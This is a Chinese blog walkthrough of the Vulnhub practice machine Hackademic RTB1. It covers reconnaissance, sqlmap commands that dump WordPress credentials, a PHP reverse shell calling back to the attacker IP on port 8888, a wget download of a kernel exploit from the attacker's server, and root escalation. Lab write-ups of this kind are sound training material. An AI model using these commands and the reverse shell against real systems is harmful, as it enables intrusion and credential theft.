【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

本文详细介绍了如何通过NAT模式下的靶机(192.168.233.131)进行信息收集,包括IP获取、端口扫描和目录探测。后续步骤涉及PHP代码注入、SQL注入漏洞利用,利用shell.php获取getshell,上传恶意脚本,以及通过内核漏洞提权的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机介绍
官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/
在这里插入图片描述
需要读取靶机的root目录下key.txt
运行环境:
虚拟机网络设置的是NAT模式
靶机:IP地址:192.168.233.131
攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

image-20230703153927729

进入靶机

image​​

用wappalyzer查看用到技术

image

查看开放的端口

image-20230703173946936

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

image-20230703192555811

image-20230703192845503

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

image-20230703194526935

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

image-20230703202147050

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

image-20230703202222352

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

image-20230703202309068

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

image-20230703202333804

GeorgeMiller、q1w2e3登录

image-20230703203518703

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

image-20230703203557858

image-20230703204739867

kali打开监听

image-20230703204343618

运行反弹shell

image-20230703204715657

反弹shell成功

image-20230703204816477

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

image-20230703210505136​搜索内核漏洞

searchsploit 2.6.31

image-20230703210917302

下载到本地searchsploit -m 15285.c

image-20230703211758478​kali开启web服务器

image-20230703212054869

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

image-20230703212607768

编译脚本

gcc 15285.c -o exp

image-20230703213015682

将编译的exp赋予执行权限并执行exp

image-20230703213406686

提权成功id为0

image-20230703213620621

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值